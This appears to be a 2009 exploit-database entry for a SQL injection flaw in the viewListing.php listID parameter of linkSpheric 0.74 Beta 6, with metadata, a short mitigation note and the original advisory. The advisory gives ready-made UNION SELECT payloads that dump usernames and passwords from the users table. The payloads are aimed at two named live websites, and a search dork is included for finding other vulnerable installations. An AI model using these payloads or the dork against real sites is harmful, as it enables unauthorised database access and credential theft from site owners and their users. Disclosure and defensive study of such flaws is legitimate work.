linkSpheric 0.74 Beta 6 SQL Inejction Vulnerability

vendor:

linkSpheric

by:

NoGe

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: linkSpheric

Affected Version From: 0.74 Beta 6

Affected Version To: 0.74 Beta 6

Patch Exists: YES

Related CWE: N/A

CPE: a:dataspheric:linkspheric:0.74_beta_6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

linkSpheric 0.74 Beta 6 SQL Inejction Vulnerability

An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending a specially crafted HTTP request to the vulnerable application. The malicious SQL query can be sent as a parameter value in the vulnerable URL. This can allow an attacker to access or modify the data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being passed to the database.

Source

Exploit-DB raw data:

===============================================================================================


  [o] linkSpheric 0.74 Beta 6 SQL Inejction Vulnerability

       Software : linkSpheric version 0.74 Beta 6
       Vendor   : http://dataspheric.com/
       Download : http://sourceforge.net/projects/linkspheric/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===============================================================================================


  [o] Vulnerable file

        viewListing.php



  [o] Exploit

       http://localhost/[path]/viewListing.php?listID=[SQL]



  [o] Proof of concept

       http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
       http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--



  [o] Dork

       "Powered by linkSpheric"


===============================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.net ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

        
===============================================================================================

# milw0rm.com [2009-07-30]